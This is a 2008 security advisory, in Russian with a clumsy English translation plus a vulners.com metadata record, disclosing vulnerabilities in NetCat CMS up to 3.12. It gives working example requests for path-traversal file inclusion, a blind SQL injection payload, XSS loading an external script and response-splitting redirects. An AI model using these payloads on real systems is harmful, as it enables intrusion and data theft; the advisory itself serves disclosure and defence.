Многочисленные уязвимости в NetCat CMS <= 3.12
Описание:
Были обнаружены многочисленные уязвимости в CMS NetCat 3.12. Некоторым
уязвимостям, перечисленным ниже, также подвержена версия NetCat 3.0.
1. Множественные уязвимости типа "Чтение произвольных файлов" (File
Including)
Уязвимость существует по причине того, что возможен прямой доступ к
некоторым файлам, в обход логики работы приложения.
Это дает возможность переопределить внутренние переменные, которые
передаются в качестве аргументов в функцию include().
Примеры уязвимых файлов:
/netcat/modules/netshop/post.php?system=../../../../.htaccess%00
/netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00
/netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00
/netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00
/netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00
Примечание:
Для эксплуатации уязвимости требуются следующие настройки PHP:
register_globals=On (не для всех) и magic_quotes_gpc=Off
2. Слепое выполнение произвольных SQL-запросов (Blind SQL Injection)
Уязвимость была обнаружена в следующем запросе:
/netcat/modules/auth/password_recovery.php?=1'SQL_code
Пример эксплуатации:
/netcat/modules/auth/password_recovery.php?=1'/**/OR/**/VERSION()/**/LIKE/**/'4%'/*Примечание:Для эксплуатации уязвимости требуется отключенный magic_quotes_gpc.3. Уязвимости типа "Межсайтовое выполнение сценариев" (Cross-site Scripting,XSS)Уязвимости были обнаружены в следующих запросах: /netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" /netcat/FCKeditor/neditor.php?form=<XSS>&control=<XSS> и др.4. Расщепление HTTP-запроса (HTTP Response Splitting)Уязвимости были обнаружены в следующих запросах: /netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com /netcat/modules/linkmanager/redirect.php?url=http://www.google.com5. CRLF injectionУязвимость существует в момент установки значения %0a в переменные COOKIE.Уязвимость была обнаружена при обращении к файлу /netcat/add.php.- - -NetCat <= 3.12 Multiple Remote VulnerabilitiesThe description:The set vulnerability in CMS NetCat versions 3.12 and more low was revealed.1. Multiple File Including VulnerabilitiesVulnerability exists for the reason that direct access to some files, aroundlogicians of work of the appendix is possible.It gives the chance to redefine internal variables which are transferred asarguments in function include ().Examples of vulnerable files: /netcat/modules/netshop/post.php?system=../../../../.htaccess%00 /netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00The note:For vulnerability operation the following options PHP are required:register_globals=On and magic_quotes_gpc=Off2. Blind SQL Injection VulnerabilitiesExamples of vulnerable files: /netcat/modules/auth/password_recovery.php?=1'SQL_codeExample: /netcat/modules/auth/password_recovery.php?=1'/**/OR/**/VERSION()/**/LIKE/**/'4%'/*The note:For vulnerability operation the following options PHP are required:magic_quotes_gpc=Off3. Multiple Cross-site Scripting VulnerabilitiesExamples of vulnerable files: /netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" /netcat/FCKeditor/neditor.php?form=<XSS>&control=<XSS> etc.4. HTTP Response SplittingExamples of vulnerable files: /netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com /netcat/modules/linkmanager/redirect.php?url=http://www.google.com5. CRLF injectionVulnerability exists at the moment of value installation %0a in COOKIEvariables.Vulnerability has been found out at the reference to a file /netcat/add.php.
{"id": "SECURITYVULNS:DOC:21075", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "\u041c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 NetCat CMS <= 3.12", "description": "\u041c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 NetCat CMS <= 3.12\r\n\r\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\r\n\u0411\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 CMS NetCat 3.12. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c \r\n\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u043c \u043d\u0438\u0436\u0435, \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f NetCat 3.0.\r\n\r\n1. \u041c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0442\u0438\u043f\u0430 "\u0427\u0442\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432" (File \r\nIncluding)\r\n\r\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e \u043f\u0440\u0438\u0447\u0438\u043d\u0435 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u0435\u043d \u043f\u0440\u044f\u043c\u043e\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \r\n\u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0444\u0430\u0439\u043b\u0430\u043c, \u0432 \u043e\u0431\u0445\u043e\u0434 \u043b\u043e\u0433\u0438\u043a\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f.\r\n\u042d\u0442\u043e \u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0435\u0440\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \r\n\u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u044e include().\r\n\u041f\u0440\u0438\u043c\u0435\u0440\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432:\r\n /netcat/modules/netshop/post.php?system=../../../../.htaccess%00\r\n /netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00\r\n /netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00\r\n /netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00\r\n /netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00\r\n\r\n\u041f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u0435:\r\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0442\u0440\u0435\u0431\u0443\u044e\u0442\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 PHP: \r\nregister_globals=On (\u043d\u0435 \u0434\u043b\u044f \u0432\u0441\u0435\u0445) \u0438 magic_quotes_gpc=Off\r\n\r\n2. \u0421\u043b\u0435\u043f\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 (Blind SQL Injection)\r\n\r\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u0435:\r\n /netcat/modules/auth/password_recovery.php?=1'SQL_code\r\n\r\n\u041f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438:\r\n /netcat/modules/auth/password_recovery.php?=1'/**/OR/**/VERSION()/**/LIKE/**/'4%'/*\u041f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u0435:\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 magic_quotes_gpc.3. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0442\u0438\u043f\u0430 "\u041c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432" (Cross-site Scripting,XSS)\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0432 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u0430\u0445: /netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" /netcat/FCKeditor/neditor.php?form=<XSS>&control=<XSS> \u0438 \u0434\u0440.4. \u0420\u0430\u0441\u0449\u0435\u043f\u043b\u0435\u043d\u0438\u0435 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430 (HTTP Response Splitting)\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0432 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u0430\u0445: /netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com /netcat/modules/linkmanager/redirect.php?url=http://www.google.com5. CRLF injection\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043c\u043e\u043c\u0435\u043d\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f %0a \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 COOKIE.\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u0438 \u043a \u0444\u0430\u0439\u043b\u0443 /netcat/add.php.- - -NetCat <= 3.12 Multiple Remote VulnerabilitiesThe description:The set vulnerability in CMS NetCat versions 3.12 and more low was revealed.1. Multiple File Including VulnerabilitiesVulnerability exists for the reason that direct access to some files, aroundlogicians of work of the appendix is possible.It gives the chance to redefine internal variables which are transferred asarguments in function include ().Examples of vulnerable files: /netcat/modules/netshop/post.php?system=../../../../.htaccess%00 /netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00 /netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00The note:For vulnerability operation the following options PHP are required:register_globals=On and magic_quotes_gpc=Off2. Blind SQL Injection VulnerabilitiesExamples of vulnerable files: /netcat/modules/auth/password_recovery.php?=1'SQL_codeExample: /netcat/modules/auth/password_recovery.php?=1'/**/OR/**/VERSION()/**/LIKE/**/'4%'/*The note:For vulnerability operation the following options PHP are required:magic_quotes_gpc=Off3. Multiple Cross-site Scripting VulnerabilitiesExamples of vulnerable files: /netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" /netcat/FCKeditor/neditor.php?form=<XSS>&control=<XSS> etc.4. HTTP Response SplittingExamples of vulnerable files: /netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com /netcat/modules/linkmanager/redirect.php?url=http://www.google.com5. CRLF injectionVulnerability exists at the moment of value installation %0a in COOKIEvariables.Vulnerability has been found out at the reference to a file /netcat/add.php.", "published": "2008-12-23T00:00:00", "modified": "2008-12-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21075", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:28", "viewCount": 97, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": 0.2}, "_state": {"dependencies": 1678962961, "score": 1684016453, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "f3c321dde7b7437d5785a5d538d174e6"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}